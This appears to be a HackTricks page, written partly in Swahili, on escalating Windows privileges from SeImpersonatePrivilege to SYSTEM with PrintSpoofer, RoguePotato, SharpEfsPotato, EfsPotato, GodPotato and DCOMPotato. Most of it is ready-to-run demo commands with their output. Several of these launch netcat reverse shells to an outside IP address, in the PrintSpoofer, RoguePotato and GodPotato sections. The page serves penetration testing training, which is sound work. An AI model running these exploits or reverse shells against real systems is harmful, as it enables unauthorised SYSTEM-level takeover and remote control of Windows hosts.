# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato {{#include ../../banners/hacktricks-training.md}} > [!WARNING] > **JuicyPotato haitumiki** kwenye Windows Server 2019 na Windows 10 build 1809 kuendelea. Hata hivyo, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** zinaweza kutumika **kuongeza mamlaka sawa na kupata ufikiaji wa kiwango cha `NT AUTHORITY\SYSTEM`**. Hii [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) inaelezea kwa undani kuhusu zana ya `PrintSpoofer`, ambayo inaweza kutumika kuboresha mamlaka ya uigaji kwenye Windows 10 na Server 2019 ambapo JuicyPotato haitumiki tena. ## Quick Demo ### PrintSpoofer ```bash c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -------------------------------------------------------------------------------- [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK NULL ``` ### RoguePotato ```bash c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999 # In some old versions you need to use the "-f" param c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999 ``` ### SharpEfsPotato ```bash > SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" SharpEfsPotato by @bugch3ck Local privilege escalation from SeImpersonatePrivilege using EfsRpc. Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0. [+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2 df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc: [x]RpcBindingSetAuthInfo failed with status 0x6d3 [+] Server connected to our evil RPC pipe [+] Duplicated impersonation token ready for process creation [+] Intercepted and authenticated successfully, launching program [+] Process created, enjoy! C:\temp>type C:\temp\w.log nt authority\system ``` ### EfsPotato ```bash > EfsPotato.exe "whoami" Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). Part of GMH's fuck Tools, Code By zcgonvh. CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] [+] Current user: NT Service\MSSQLSERVER [+] Pipe: \pipe\lsarpc [!] binding ok (handle=aeee30) [+] Get Token: 888 [!] process with pid: 3696 created. ============================== [x] EfsRpcEncryptFileSrv failed: 1818 nt authority\system ``` ### GodPotato ```bash > GodPotato -cmd "cmd /c whoami" # You can achieve a reverse shell like this. > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" ``` ### DCOMPotato ![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa) ## References - [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) - [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer) - [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) - [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) - [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) - [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) - [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato) {{#include ../../banners/hacktricks-training.md}}